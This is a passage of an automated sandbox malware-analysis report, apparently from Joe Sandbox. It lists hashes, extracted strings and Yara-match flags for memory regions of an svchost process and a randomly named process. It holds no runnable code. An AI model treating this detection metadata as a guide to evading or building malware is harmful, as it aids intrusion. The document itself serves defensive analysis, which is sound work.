                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              • Opcode ID: 8edaa95277f77d1f3dad6c13c8992ce6a7eacbfba8783e83b242fb7da59af778
                                                                                                              • Instruction ID: 1aabcf3da9a3235e24e763a942f275d0993f24d19d57f1bfdf56f9e082e25d5a
                                                                                                              • Opcode Fuzzy Hash: 8edaa95277f77d1f3dad6c13c8992ce6a7eacbfba8783e83b242fb7da59af778
                                                                                                              • Instruction Fuzzy Hash: 1C51E935A007196ADF20EAA9DC86FBE77B8EF0430CF1400F9E515AB192DFB59E458B50
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                              • Instruction ID: c98adefd2fe21eb7a86325b7c6ea356b3f706f4d12cdedb210bce4eace38ae73
                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                              • Instruction Fuzzy Hash: D1818D74E052499EDF28CE68C8917FEFBA5EF45358F1C42EAD871AB390C63499408F50
                                                                                                              Strings
                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03BA02E7
                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03BA02BD
                                                                                                              • RTL: Re-Waiting, xrefs: 03BA031E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                              • API String ID: 0-2474120054
                                                                                                              • Opcode ID: 087b3c6e218ef54720085f7c6e3b4acc6130a3b5462a808bd7e03f696cd86970
                                                                                                              • Instruction ID: 510e3df8f61d4da77e553b79e594c9d7072bdefd73ebe65b350634b140656ef6
                                                                                                              • Opcode Fuzzy Hash: 087b3c6e218ef54720085f7c6e3b4acc6130a3b5462a808bd7e03f696cd86970
                                                                                                              • Instruction Fuzzy Hash: 7EE18B30608B41DFD725DF28C884B2AF7E4FB88318F184AB9F9A58B291D774D945CB42
                                                                                                              Strings
                                                                                                              • RTL: Resource at %p, xrefs: 03BA7B8E
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03BA7B7F
                                                                                                              • RTL: Re-Waiting, xrefs: 03BA7BAC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 0-871070163
                                                                                                              • Opcode ID: 662b2cbca6065cb9a2120ee14f295194e3c45a22ae1abea4f0f90c9990b7a974
                                                                                                              • Instruction ID: be1c3da9c046d706e21d55d1abf6427ce4344e5dc764548732c983d4fc19e5fa
                                                                                                              • Opcode Fuzzy Hash: 662b2cbca6065cb9a2120ee14f295194e3c45a22ae1abea4f0f90c9990b7a974
                                                                                                              • Instruction Fuzzy Hash: D341F235704B028FC724DE29CC51B6AB7E9EB88718F040ABDE95ADB291DB70E4058B91
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03BA728C
                                                                                                              Strings
                                                                                                              • RTL: Resource at %p, xrefs: 03BA72A3
                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03BA7294
                                                                                                              • RTL: Re-Waiting, xrefs: 03BA72C1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-605551621
                                                                                                              • Opcode ID: a58de2fcca25127f853a506746bf61fb5a3f279b15348b60c2fc0b2297575efd
                                                                                                              • Instruction ID: d59ce6bb61568b8cc3336843d55ab8582c602670d6e548c617b9d9ab44cd8cee
                                                                                                              • Opcode Fuzzy Hash: a58de2fcca25127f853a506746bf61fb5a3f279b15348b60c2fc0b2297575efd
                                                                                                              • Instruction Fuzzy Hash: 4C410135B08B06ABCB20CE69CC42B6AB7B5FB85718F1406B9F855DB241DB24E81287D0
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 0-1194432280
                                                                                                              APIs
                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 03BBCFBD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallFilterFunc@8
                                                                                                              • String ID: @$@4_w@4_w
                                                                                                              • API String ID: 4062629308-713214301
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: +$+$7`$7b$8s$?4$@/$AR$R#$X{$]s$mx$#$0$W
                                                                                                              • API String ID: 0-242658730
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6$O$S$\$s
                                                                                                              • API String ID: 0-3854637164
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: m@
                                                                                                              • API String ID: 0-3881191045
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_2470000_GmuPchEfAM.jbxd
                                                                                                              Strings
                                                                                                              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                              • API String ID: 0-392141074